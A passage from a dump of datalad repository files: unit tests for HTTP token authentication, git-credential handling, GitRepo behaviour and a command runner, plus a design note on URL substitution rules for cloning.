there\n\n    downloader = HTTPDownloader(credential=credential, authenticator=authenticator)\n    downloader.download(url, path=d)\n\n    content = read_file(fpath)\n    assert_equal(content, \"correct body\")\n\n\nclass FakeCredential3(Token):\n    \"\"\"Credential to test scenarios.\"\"\"\n    _fixed_credentials = {'token' : 'testtoken' }\n    def is_known(self):\n        return True\n    def __call__(self):\n        return self._fixed_credentials\n    def enter_new(self):\n        return self._fixed_credentials\n\n@skip_if(not httpretty, \"no httpretty\")\n@without_http_proxy\n@httpretty.activate\n@with_tempfile(mkdir=True)\n@with_fake_cookies_db\ndef test_HTTPBearerTokenAuthenticator(d=None):\n    fpath = opj(d, 'crap.txt')\n\n    def request_get_callback(request, uri, headers):\n        # We can't assert inside the callback, or running the\n        # test give \"Connection aborted\" errors instead of telling\n        # us that the assertion failed. 
So instead, we make\n        # the request object available outside of the callback\n        # and do the assertions in the main test, not the callback\n        request_get_callback.req = request\n        return (200, headers, \"correct body\")\n\n    httpretty.register_uri(httpretty.GET, url,\n                           body=request_get_callback)\n\n\n\n    credential = FakeCredential3(name='test', url=None)\n    authenticator = HTTPBearerTokenAuthenticator()\n    downloader = HTTPDownloader(credential=credential, authenticator=authenticator)\n    downloader.download(url, path=d)\n\n    # Perform assertions. See note above.\n    r = request_get_callback.req\n    assert_equal(r.body, b'')\n    assert_in('Authorization', r.headers)\n    assert_equal(r.headers['Authorization'], \"Bearer testtoken\")\n\n    content = read_file(fpath)\n    assert_equal(content, \"correct body\")\n\n\nclass FakeLorisCredential(Token):\n    \"\"\"Credential to test scenarios.\"\"\"\n    _fixed_credentials = {'token' : 'testtoken' }\n    def is_known(self):\n        return False\n@skip_if(not httpretty, \"no httpretty\")\n@without_http_proxy\n@httpretty.activate\n@with_tempfile(mkdir=True)\n@with_fake_cookies_db\ndef test_HTTPLorisTokenAuthenticator(d=None):\n    fpath = opj(d, 'crap.txt')\n\n    def request_get_callback(request, uri, headers):\n        # We can't assert inside the callback, or running the\n        # test give \"Connection aborted\" errors instead of telling\n        # us that the assertion failed. So instead, we make\n        # the request object available outside of the callback\n        # and do the assertions in the main test, not the callback\n        request_get_callback.req = request\n        return (200, headers, \"correct body\")\n\n    httpretty.register_uri(httpretty.GET, url,\n                           body=request_get_callback)\n\n\n\n    credential = FakeCredential3(name='test', url=None)\n    authenticator = HTTPBearerTokenAuthenticator()\n    downloader = HTTPDownloader(credential=credential, authenticator=authenticator)\n    downloader.download(url, path=d)\n\n    # Perform assertions. See note above.\n    r = request_get_callback.req\n    assert_equal(r.body, b'')\n    assert_in('Authorization', r.headers)\n    assert_equal(r.headers['Authorization'], \"Bearer testtoken\")\n\n    content = read_file(fpath)\n    assert_equal(content, \"correct body\")\n\n\n@skip_if(not httpretty, \"no httpretty\")\n@without_http_proxy\n@httpretty.activate\n@with_tempfile(mkdir=True)\n@with_fake_cookies_db\n@with_memory_keyring\n@with_testsui(responses=['yes', 'user'])\ndef test_lorisadapter(d=None, keyring=None):\n    fpath = opj(d, 'crap.txt')\n    loginurl = \"http://www.example.com/api/v0.0.2/login\"\n\n    def request_get_callback(request, uri, headers):\n        # We can't assert inside the callback, or running the\n        # test give \"Connection aborted\" errors instead of telling\n        # us that the assertion failed. 
So instead, we make\n # the request object available outside of the callback\n # and do the assertions in the main test, not the callback\n request_get_callback.req = request\n return (200, headers, \"correct body\")\n def request_post_callback(request, uri, headers):\n return (200, headers, '{ \"token\": \"testtoken33\" }')\n\n httpretty.register_uri(httpretty.GET, url,\n body=request_get_callback)\n httpretty.register_uri(httpretty.POST, loginurl,\n body=request_post_callback)\n\n\n\n credential = LORIS_Token(name='test', url=loginurl, keyring=None)\n authenticator = HTTPBearerTokenAuthenticator()\n downloader = HTTPDownloader(credential=credential, authenticator=authenticator)\n downloader.download(url, path=d)\n\n r = request_get_callback.req\n assert_equal(r.body, b'')\n assert_in('Authorization', r.headers)\n assert_equal(r.headers['Authorization'], \"Bearer testtoken33\")\n # Verify credentials correctly set to test user:pass\n\n content = read_file(fpath)\n assert_equal(content, \"correct body\")\n\n\n@with_tree(tree=[('file.dat', 'abc')])\n@serve_path_via_http\ndef test_download_url(toppath=None, topurl=None):\n furl = \"%sfile.dat\" % topurl\n # fails if URL is dysfunctional\n assert_raises(DownloadError, download_url, furl + 'magic', toppath)\n\n # working download\n tfpath = opj(toppath, \"file-downloaded.dat\")\n download_url(furl, tfpath)\n ok_file_has_content(tfpath, 'abc')\n\n # fails if destfile exists\n assert_raises(DownloadError, download_url, furl, tfpath)\n # works when forced\n download_url(furl, tfpath, overwrite=True)\n" }, { "alpha_fraction": 0.636814534664154, "alphanum_fraction": 0.6397079229354858, "avg_line_length": 36.60621643066406, "blob_id": "d1954638fae0aca89380d3f9fbfdf1264a18a280", "content_id": "74f798d8c9e515d2aef864875d0e8505c07aa749", "detected_licenses": [ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7258, "license_type": "permissive", "max_line_length": 80, "num_lines": 193, "path": "/datalad/local/tests/test_gitcredential.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test git-credential wrapper and helper\"\"\"\n\nfrom datalad.api import Dataset\nfrom datalad.downloaders.credentials import UserPassword\nfrom datalad.local.gitcredential import GitCredentialInterface\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_is_instance,\n assert_not_in,\n assert_true,\n eq_,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n)\n\n\n@with_tempfile\ndef test_gitcredential_interface(path=None):\n # use a dataset as a local configuration vehicle\n ds = Dataset(path).create()\n\n # preserve credentials between git processes for a brief time\n # credential-cache is not supported on windows (needs UNIX sockets)\n # ds.config.set('credential.helper', 'cache', scope='local')\n # However, first set an empty helper in order to disable already set helpers\n ds.config.set('credential.helper', '', scope='local')\n ds.config.set('credential.helper', 'store', scope='local')\n\n # git manages credentials by target URL\n credurl = 'https://example.datalad.org/somepath'\n credurl_justhost = 
'https://example.datalad.org'\n # define a credential\n cred = GitCredentialInterface(url=credurl, username='mike',\n password='s3cr3t', repo=ds)\n # put it in the manager (a cache in this case, but could invoke any number\n # of helpers\n cred.approve()\n # new instance, no knowledge of login\n cred = GitCredentialInterface(url=credurl, repo=ds)\n assert_not_in('username', cred)\n # query store\n cred.fill()\n eq_(cred['username'], 'mike')\n eq_(cred['password'], 's3cr3t')\n # git does host-only identification by default (see credential.useHttpPath)\n cred = GitCredentialInterface(url=credurl_justhost, repo=ds)\n cred.fill()\n eq_(cred['username'], 'mike')\n eq_(cred['password'], 's3cr3t')\n\n # the URL is enough to remove (\"reject\") a credential\n GitCredentialInterface(url=credurl, repo=ds).reject()\n\n cred = GitCredentialInterface(url=credurl, repo=ds)\n # this will yield empty passwords, not the most precise test\n # whether it actually removed the credentials, but some test\n # at least\n cred.fill()\n assert_false(cred['username'])\n assert_false(cred['password'])\n\n\n@with_tempfile\ndef test_datalad_credential_helper(path=None):\n\n ds = Dataset(path).create()\n\n # tell git to use git-credential-datalad\n ds.config.add('credential.helper', 'datalad', scope='local')\n ds.config.add('datalad.credentials.githelper.noninteractive', 'true',\n scope='global')\n\n from datalad.downloaders.providers import Providers\n\n url1 = \"https://datalad-test.org/some\"\n url2 = \"https://datalad-test.org/other\"\n provider_name = \"datalad-test.org\"\n\n # `Providers` code is old and only considers a dataset root based on PWD\n # for config lookup. contextmanager below can be removed once the\n # provider/credential system is redesigned.\n with chpwd(ds.path):\n\n gitcred = GitCredentialInterface(url=url1, repo=ds)\n\n # There's nothing set up yet, helper should return empty\n gitcred.fill()\n eq_(gitcred['username'], '')\n eq_(gitcred['password'], '')\n\n # store new credentials\n # Note, that `Providers.enter_new()` currently uses user-level config\n # files for storage only. 
TODO: make that an option!\n # To not mess with existing ones, fail if it already exists:\n\n cfg_file = Path(Providers._get_providers_dirs()['user']) \\\n / f\"{provider_name}.cfg\"\n assert_false(cfg_file.exists())\n\n # Make sure we clean up\n from datalad.tests import _TEMP_PATHS_GENERATED\n _TEMP_PATHS_GENERATED.append(str(cfg_file))\n\n # Give credentials to git and ask it to store them:\n gitcred = GitCredentialInterface(url=url1, username=\"dl-user\",\n password=\"dl-pwd\", repo=ds)\n gitcred.approve()\n\n assert_true(cfg_file.exists())\n providers = Providers.from_config_files()\n p1 = providers.get_provider(url=url1, only_nondefault=True)\n assert_is_instance(p1.credential, UserPassword)\n eq_(p1.credential.get('user'), 'dl-user')\n eq_(p1.credential.get('password'), 'dl-pwd')\n\n # default regex should be host only, so matching url2, too\n p2 = providers.get_provider(url=url2, only_nondefault=True)\n assert_is_instance(p1.credential, UserPassword)\n eq_(p1.credential.get('user'), 'dl-user')\n eq_(p1.credential.get('password'), 'dl-pwd')\n\n # git, too, should now find it for both URLs\n gitcred = GitCredentialInterface(url=url1, repo=ds)\n gitcred.fill()\n eq_(gitcred['username'], 'dl-user')\n eq_(gitcred['password'], 'dl-pwd')\n\n gitcred = GitCredentialInterface(url=url2, repo=ds)\n gitcred.fill()\n eq_(gitcred['username'], 'dl-user')\n eq_(gitcred['password'], 'dl-pwd')\n\n # Rejection must not currently lead to deleting anything, since we would\n # delete too broadly.\n gitcred.reject()\n assert_true(cfg_file.exists())\n gitcred = GitCredentialInterface(url=url1, repo=ds)\n gitcred.fill()\n eq_(gitcred['username'], 'dl-user')\n eq_(gitcred['password'], 'dl-pwd')\n dlcred = UserPassword(name=provider_name)\n eq_(dlcred.get('user'), 'dl-user')\n eq_(dlcred.get('password'), 'dl-pwd')\n\n\n@with_tempfile\ndef test_credential_cycle(path=None):\n\n # Test that we break a possible cycle when DataLad is configured to query\n # git-credential and Git is configured to query DataLad.\n # This may happen in a not-so-obvious fashion, if git-credential-datalad\n # was configured generally rather than for a specific URL, while there's a\n # datalad provider config pointing to Git for a particular URL.\n\n ds = Dataset(path).create()\n\n # tell git to use git-credential-datalad\n ds.config.add('credential.helper', 'datalad', scope='local')\n ds.config.add('datalad.credentials.githelper.noninteractive', 'true',\n scope='global')\n\n provider_dir = ds.pathobj / '.datalad' / 'providers'\n provider_dir.mkdir(parents=True, exist_ok=True)\n provider_cfg = provider_dir / 'test_cycle.cfg'\n provider_cfg.write_text(r\"\"\"\n[provider:test_cycle]\n url_re = http.*://.*data\\.example\\.com\n authentication_type = http_basic_auth\n credential = test_cycle_cred\n[credential:test_cycle_cred]\n type = git\n\"\"\")\n ds.save(message=\"Add provider config\")\n\n gitcred = GitCredentialInterface(url=\"https://some.data.exampe.com\",\n repo=ds)\n\n # There's nothing set up yet, helper should return empty.\n # Importantly, it shouldn't end up in an endless recursion, but just\n # return w/o something filled in.\n gitcred.fill()\n eq_(gitcred['username'], '')\n eq_(gitcred['password'], '')\n" }, { "alpha_fraction": 0.6081070303916931, "alphanum_fraction": 0.6176494359970093, "avg_line_length": 31.436508178710938, "blob_id": "149144c9531e2d21cf89fac665255008932a7eab", "content_id": "18f4257d30366dc7173fb6d4cd6d2617232d18ae", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": 
false, "language": "Python", "length_bytes": 12261, "license_type": "permissive", "max_line_length": 87, "num_lines": 378, "path": "/datalad/dataset/tests/test_gitrepo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test implementation of class GitRepo\n\n\"\"\"\n\nimport logging\nimport os\nimport os.path as op\nimport sys\n\nfrom datalad.dataset.gitrepo import (\n GitRepo,\n _get_dot_git,\n)\nfrom datalad.support.exceptions import (\n CommandError,\n PathKnownToRepositoryError,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_cwd_unchanged,\n assert_equal,\n assert_false,\n assert_in,\n assert_is_instance,\n assert_not_in,\n assert_raises,\n eq_,\n neq_,\n ok_,\n swallow_logs,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n)\n\n\n@with_tempfile(mkdir=True)\ndef test_GitRepo_invalid_path(path=None):\n with chpwd(path):\n assert_raises(ValueError, GitRepo, path=\"git://some/url\")\n ok_(not op.exists(op.join(path, \"git:\")))\n assert_raises(ValueError, GitRepo, path=\"file://some/relative/path\")\n ok_(not op.exists(op.join(path, \"file:\")))\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_GitRepo_instance_from_existing(path=None):\n GitRepo(path).init()\n\n gr = GitRepo(path)\n assert_is_instance(gr, GitRepo, \"GitRepo was not created.\")\n ok_(op.exists(op.join(path, '.git')))\n\n\n@assert_cwd_unchanged\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_instance_from_not_existing(path=None, path2=None):\n # 1. create=False and path doesn't exist:\n repo = GitRepo(path)\n assert_false(op.exists(path))\n\n # 2. create=False, path exists, but no git repo:\n os.mkdir(path)\n ok_(op.exists(path))\n repo = GitRepo(path)\n assert_false(op.exists(op.join(path, '.git')))\n\n # 3. create=True, path doesn't exist:\n gr = GitRepo(path2).init()\n assert_is_instance(gr, GitRepo, \"GitRepo was not created.\")\n ok_(op.exists(op.join(path2, '.git')))\n # re-enable from core GitRepo has a status() method\n #assert_repo_status(path2, annex=False)\n\n # 4. 
create=True, path exists, but no git repo:\n gr = GitRepo(path).init()\n assert_is_instance(gr, GitRepo, \"GitRepo was not created.\")\n ok_(op.exists(op.join(path, '.git')))\n # re-enable from core GitRepo has a status() method\n #assert_repo_status(path, annex=False)\n\n\n@with_tempfile\ndef test_GitRepo_init_options(path=None):\n # passing an option, not explicitly defined in GitRepo class:\n gr = GitRepo(path).init(init_options=['--bare'])\n ok_(gr.cfg.getbool(section=\"core\", option=\"bare\"))\n\n\n@with_tree(\n tree={\n 'subds': {\n 'file_name': ''\n }\n }\n)\ndef test_init_fail_under_known_subdir(path=None):\n repo = GitRepo(path).init()\n repo.call_git(['add', op.join('subds', 'file_name')])\n # Should fail even if we do not commit but only add to index:\n with assert_raises(PathKnownToRepositoryError) as cme:\n GitRepo(op.join(path, 'subds')).init()\n assert_in(\"file_name\", str(cme.value)) # we provide a list of offenders\n # and after we commit - the same story\n repo.call_git(['commit', '-m', \"added file\"])\n with assert_raises(PathKnownToRepositoryError) as cme:\n GitRepo(op.join(path, 'subds')).init()\n\n # But it would succeed if we disable the checks\n GitRepo(op.join(path, 'subds')).init(sanity_checks=False)\n\n\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_equals(path1=None, path2=None):\n\n repo1 = GitRepo(path1)\n repo2 = GitRepo(path1)\n ok_(repo1 == repo2)\n eq_(repo1, repo2)\n repo2 = GitRepo(path2)\n neq_(repo1, repo2)\n ok_(repo1 != repo2)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_GitRepo_flyweight(path1=None, path2=None):\n\n import gc\n\n repo1 = GitRepo(path1).init()\n assert_is_instance(repo1, GitRepo)\n\n # Due to issue 4862, we currently still require gc.collect() under unclear\n # circumstances to get rid of an exception traceback when creating in an\n # existing directory. That traceback references the respective function\n # frames which in turn reference the repo instance (they are methods).\n # Doesn't happen on all systems, though. 
Eventually we need to figure that\n # out.\n # However, still test for the refcount after gc.collect() to ensure we don't\n # introduce new circular references and make the issue worse!\n gc.collect()\n\n # As long as we don't reintroduce any circular references or produce\n # garbage during instantiation that isn't picked up immediately, `repo1`\n # should be the only counted reference to this instance.\n # Note, that sys.getrefcount reports its own argument and therefore one\n # reference too much.\n assert_equal(1, sys.getrefcount(repo1) - 1)\n\n # instantiate again:\n repo2 = GitRepo(path1).init()\n assert_is_instance(repo2, GitRepo)\n\n # the very same object:\n ok_(repo1 is repo2)\n\n # reference the same in a different way:\n with chpwd(path1):\n repo3 = GitRepo(op.relpath(path1, start=path2))\n\n # it's the same object:\n ok_(repo1 is repo3)\n\n # and realpath attribute is the same, so they are still equal:\n ok_(repo1 == repo3)\n\n orig_id = id(repo1)\n\n # Be sure we have exactly one object in memory:\n assert_equal(1, len([o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.pathobj == Path(path1)]))\n\n # deleting one reference doesn't change anything - we still get the same\n # thing:\n gc.collect() # TODO: see first comment above\n del repo1\n ok_(repo2 is not None)\n ok_(repo2 is repo3)\n ok_(repo2 == repo3)\n\n # re-requesting still delivers the same thing:\n repo1 = GitRepo(path1)\n assert_equal(orig_id, id(repo1))\n\n # killing all references should result in the instance being gc'd and\n # re-request yields a new object:\n del repo1\n del repo2\n\n # Killing last reference will lead to garbage collection which will call\n # GitRepo's finalizer:\n with swallow_logs(new_level=1) as cml:\n del repo3\n gc.collect() # TODO: see first comment above\n cml.assert_logged(msg=\"Finalizer called on: GitRepo(%s)\" % path1,\n level=\"Level 1\",\n regex=False)\n\n # Flyweight is gone:\n assert_not_in(path1, GitRepo._unique_instances.keys())\n # gc doesn't know any instance anymore:\n assert_equal([], [o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.pathobj == Path(path1)])\n\n # new object is created on re-request:\n repo1 = GitRepo(path1)\n assert_equal(1, len([o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.pathobj == Path(path1)]))\n\n\n@with_tree({\"foo\": \"foo\", \"bar\": \"bar\"})\ndef test_gitrepo_call_git_methods(path=None):\n gr = GitRepo(path).init()\n gr.call_git(['add', \"foo\", \"bar\"])\n gr.call_git(['commit', '-m', \"foobar\"])\n gr.call_git([\"mv\"], files=[\"foo\", \"foo.txt\"])\n ok_((gr.pathobj / 'foo.txt').exists())\n\n for expect_fail, check in [(False, assert_in),\n (True, assert_not_in)]:\n with swallow_logs(new_level=logging.DEBUG) as cml:\n with assert_raises(CommandError):\n gr.call_git([\"mv\"], files=[\"notthere\", \"dest\"],\n expect_fail=expect_fail)\n check(\"fatal: bad source\", cml.out)\n\n eq_(list(gr.call_git_items_([\"ls-files\"], read_only=True)),\n [\"bar\", \"foo.txt\"])\n eq_(list(gr.call_git_items_([\"ls-files\", \"-z\"], sep=\"\\0\", read_only=True)),\n # Note: The custom separator has trailing empty item, but this is an\n # arbitrary command with unknown output it isn't safe to trim it.\n [\"bar\", \"foo.txt\"])\n\n with assert_raises(AssertionError):\n gr.call_git_oneline([\"ls-files\"], read_only=True)\n\n eq_(gr.call_git_oneline([\"ls-files\"], files=[\"bar\"], read_only=True),\n \"bar\")\n\n ok_(gr.call_git_success([\"rev-parse\", \"HEAD^{commit}\"], read_only=True))\n with 
swallow_logs(new_level=logging.DEBUG) as cml:\n assert_false(gr.call_git_success([\"rev-parse\", \"HEAD^{blob}\"],\n read_only=True))\n assert_not_in(\"expected blob type\", cml.out)\n\n\n@with_tree(tree={\"foo\": \"foo content\",\n \"bar\": \"bar content\"})\ndef test_fake_dates(path=None):\n raise SkipTest(\"Core GitRepo class does not have format_commit() yet\")\n\n gr = GitRepo(path).init()\n gr.cfg.set('datalad.fake-dates', 'true')\n\n gr.call_git(['add', \"foo\"])\n gr.call_git(['commit', '-m', 'some', \"foo\"])\n\n seconds_initial = gr.cfg.obtain(\"datalad.fake-dates-start\")\n\n # First commit is incremented by 1 second.\n eq_(seconds_initial + 1,\n int(gr.format_commit('%at')))\n\n # The second commit by 2.\n gr.call_git(['add', \"bar\"])\n gr.call_git(['commit', '-m', 'some', \"bar\"])\n eq_(seconds_initial + 2,\n int(gr.format_commit('%at')))\n\n # If we checkout another branch, its time is still based on the latest\n # timestamp in any local branch.\n gr.call_git(['checkout', \"--orphan\", 'other'])\n with open(op.join(path, \"baz\"), \"w\") as ofh:\n ofh.write(\"baz content\")\n gr.call_git(['add', \"baz\"])\n gr.call_git(['commit', '-m', 'some', \"baz\"])\n eq_(gr.get_active_branch(), \"other\")\n eq_(seconds_initial + 3,\n int(gr.format_commit('%at')))\n\n\n@with_tempfile(mkdir=True)\n@with_tree(tree={\".git\": {}})\n@with_tree(tree={\"HEAD\": \"\",\n \"config\": \"\"})\n@with_tree(tree={\".git\": \"gitdir: subdir\"})\ndef test_get_dot_git(emptycase=None, gitdircase=None, barecase=None, gitfilecase=None):\n emptycase = Path(emptycase)\n gitdircase = Path(gitdircase)\n barecase = Path(barecase)\n gitfilecase = Path(gitfilecase)\n\n # the test is not actually testing resolving (we can trust that)\n # but it is exercising the internal code paths involved in it\n for r in (True, False):\n assert_raises(RuntimeError, _get_dot_git, emptycase, resolved=r)\n eq_(_get_dot_git(emptycase, ok_missing=True, resolved=r),\n emptycase / '.git')\n\n eq_(_get_dot_git(gitdircase, resolved=r),\n (gitdircase.resolve() if r else gitdircase) / '.git')\n\n eq_(_get_dot_git(barecase, resolved=r),\n barecase.resolve() if r else barecase)\n\n eq_(_get_dot_git(gitfilecase, resolved=r),\n (gitfilecase.resolve() if r else gitfilecase) / 'subdir')\n\n\nfile1_content = \"file1 content\\n\"\nfile2_content = \"file2 content\\0\"\nexample_tree = {\n \"file1\": file1_content,\n \"file2\": file2_content\n}\n\n\ndef _create_test_gitrepo(temp_dir):\n repo = GitRepo(temp_dir)\n repo.init()\n repo.call_git([\"add\", \".\"])\n repo.call_git([\"commit\", \"-m\", \"test commit\"])\n\n hash_keys = tuple(\n repo.call_git([\"hash-object\", file_name]).strip()\n for file_name in (\"file1\", \"file2\")\n )\n return repo, hash_keys\n\n\n@with_tree(tree=example_tree)\ndef test_call_git_items(temp_dir=None):\n # check proper handling of separator in call_git_items_\n repo, (hash1, hash2) = _create_test_gitrepo(temp_dir)\n\n expected_tree_lines = (\n f'100644 blob {hash1}\\tfile1',\n f'100644 blob {hash2}\\tfile2'\n )\n\n assert_equal(\n expected_tree_lines,\n tuple(repo.call_git_items_([\"ls-tree\", \"HEAD\"]))\n )\n\n assert_equal(\n expected_tree_lines,\n tuple(repo.call_git_items_([\"ls-tree\", \"-z\", \"HEAD\"], sep=\"\\0\"))\n )\n\n\n@with_tree(tree=example_tree)\ndef test_call_git_call_git_items_identity(temp_dir=None):\n # Ensure that git_call() and \"\".join(call_git_items_(..., keep_ends=True))\n # yield the same result and that the result is identical to the file content\n\n repo, hash_keys = 
_create_test_gitrepo(temp_dir)\n args = [\"cat-file\", \"-p\"]\n for hash_key, content in zip(hash_keys, (file1_content, file2_content)):\n r_item = \"\".join(repo.call_git_items_(args + [hash_key], keep_ends=True))\n r_no_item = repo.call_git(args, [hash_key])\n assert_equal(r_item, r_no_item)\n assert_equal(r_item, content)\n" }, { "alpha_fraction": 0.7586900591850281, "alphanum_fraction": 0.7647227644920349, "avg_line_length": 43.063289642333984, "blob_id": "63b5b230c7d95d265d2fa2fae65ebccedbbae48c", "content_id": "17ec10618745d3d6acaa276beb882233e89fdfe6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3481, "license_type": "permissive", "max_line_length": 85, "num_lines": 79, "path": "/docs/source/design/url_substitution.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_url_substitution:\n\n****************\nURL substitution\n****************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation. This implementation\n is covering URL substitution in ``clone`` only. A further extension to\n URL processing elsewhere is possible.\n\nURL substitution is a transformation of a given URL using a set of\nspecifications. Such specification can be provided as configuration settings\n(via all supported configuration sources). These configuration items must\nfollow the naming scheme ``datalad.clone.url-substitute.<label>``, where\n``<label>`` is an arbitrary identifier.\n\nA substitution specification is a string with a match and substitution\nexpression, each following Python's regular expression syntax. Both\nexpressions are concatenated into a single string with an arbitrary delimiter\ncharacter. The delimiter is defined by prefixing the string with the delimiter.\nPrefix and delimiter are stripped from the expressions before processing.\nExample::\n\n ,^http://(.*)$,https://\\\\1\n\nA particular configuration item can be defined multiple times (see examples\nbelow) to form a substitution series. Substitutions in the same series will be\napplied incrementally, in order of their definition. If the first substitution\nexpression does not match, the entire series will be ignored. However,\nfollowing a first positive match all further substitutions in a series are\nprocessed, regardless whether intermediate expressions match or not.\n\nAny number of substitution series can be configured. They will be considered in\nno particular order. Consequently, it advisable to implement the first match\nspecification of any series as specific as possible, in order to prevent\nundesired transformations.\n\n\nExamples\n========\n\nChange the protocol component of a given URL in order to hand over further\nprocessing to a dedicated Git remote helper. Specifically, the following\nexample converts Open Science Framework project URLs like\n``https://osf.io/f5j3e/`` into ``osf://f5j3e``, a URL that can be handle by\n``git-remote-osf``, the Git remote helper provided by the `datalad-osf\nextension package <https://github.com/datalad/datalad-osf>`__::\n\n datalad.clone.url-substitute.osf = ,^https://osf.io/([^/]+)[/]*$,osf://\\1\n\nHere is a more complex examples with a series of substitutions. The first\nexpression ensures that only GitHub URLs are being processed. 
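The substitution specification described in the design document above maps naturally onto Python's `re` module: the first character of each spec is the delimiter, the remainder splits into a match expression and a substitution expression, and a series is only applied if its first expression matches. The function below is a minimal sketch of those documented rules under that reading (it is not the actual `clone` implementation), using the OSF example from the text as illustration.

```python
import re

def apply_substitution_series(url, series):
    # Each spec looks like ',^https://osf\.io/([^/]+)[/]*$,osf://\1':
    # the leading character defines the delimiter between the match
    # expression and the substitution expression.
    for i, spec in enumerate(series):
        delim = spec[0]
        match_expr, subst_expr = spec[1:].split(delim, 1)
        if i == 0 and not re.search(match_expr, url):
            return url  # first expression must match, otherwise skip the series
        url = re.sub(match_expr, subst_expr, url)
    return url

print(apply_substitution_series(
    "https://osf.io/f5j3e/",
    [r",^https://osf\.io/([^/]+)[/]*$,osf://\1"],
))  # -> osf://f5j3e
```

A real parser would additionally have to cope with delimiter characters occurring inside the expressions themselves; the sketch ignores that detail for brevity.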
The associated\nsubstitution disassembles the URL into its two only relevant components,\nthe organisation/user name, and the project name::\n\n datalad.clone.url-substitute.github = ,https?://github.com/([^/]+)/(.*)$,\\1###\\2\n\nAll other expressions in this series that are described below will only be considered\nif the above expression matched.\n\nThe next two expressions in the series normalize URL components that maybe be\nauto-generated by some DataLad functionality, e.g. subdataset location\ncandidate generation from directory names::\n\n # replace (back)slashes with a single dash\n datalad.clone.url-substitute.github = ,[/\\\\]+,-\n\n # replace with whitespace (URL-quoted or not) with a single underscore\n datalad.clone.url-substitute.github = ,\\s+|(%2520)+|(%20)+,_\n\nThe final expression in the series is recombining the organization/user name\nand project name components back into a complete URL::\n\n datalad.clone.url-substitute.github = ,([^#]+)###(.*),https://github.com/\\1/\\2\n" }, { "alpha_fraction": 0.580146312713623, "alphanum_fraction": 0.5867642164230347, "avg_line_length": 29.607675552368164, "blob_id": "b052619e6b0973afa431764f8ed84c871b386f59", "content_id": "6e0e5a2d6057abf9825dfb0af7c5a00a602012bd", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14360, "license_type": "permissive", "max_line_length": 114, "num_lines": 469, "path": "/datalad/runner/tests/test_witless_runner.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test WitlessRunner\n\"\"\"\n\nfrom __future__ import annotations\n\nimport logging\nimport os\nimport signal\nimport sys\nimport unittest.mock\nfrom threading import (\n Lock,\n Thread,\n)\nfrom time import (\n sleep,\n time,\n)\nfrom typing import Any\n\nimport pytest\n\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAME,\n SkipTest,\n assert_cwd_unchanged,\n assert_in,\n assert_raises,\n eq_,\n integration,\n ok_,\n ok_file_has_content,\n skip_if_on_windows,\n swallow_logs,\n with_tempfile,\n)\nfrom datalad.utils import (\n CMD_MAX_ARG,\n Path,\n on_windows,\n)\n\nfrom .. 
import (\n CommandError,\n KillOutput,\n Protocol,\n Runner,\n StdOutCapture,\n StdOutErrCapture,\n)\nfrom .utils import py2cmd\n\nresult_counter = 0\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_runner(tempfile: str = \"\") -> None:\n runner = Runner()\n content = 'Testing real run' if on_windows else 'Testing äöü東 real run'\n cmd = 'echo %s > %s' % (content, tempfile)\n res = runner.run(cmd)\n assert isinstance(res, dict)\n # no capture of any kind, by default\n ok_(not res['stdout'])\n ok_(not res['stderr'])\n ok_file_has_content(tempfile, content, strip=True)\n os.unlink(tempfile)\n\n\ndef test_runner_stderr_capture() -> None:\n runner = Runner()\n test_msg = \"stderr-Message\"\n res = runner.run(py2cmd(\n 'import sys; print(%r, file=sys.stderr)' % test_msg),\n protocol=StdOutErrCapture,\n )\n assert isinstance(res, dict)\n eq_(res['stderr'].rstrip(), test_msg)\n ok_(not res['stdout'])\n\n\ndef test_runner_stdout_capture() -> None:\n runner = Runner()\n test_msg = \"stdout-Message\"\n res = runner.run(py2cmd(\n 'import sys; print(%r, file=sys.stdout)' % test_msg),\n protocol=StdOutErrCapture,\n )\n assert isinstance(res, dict)\n 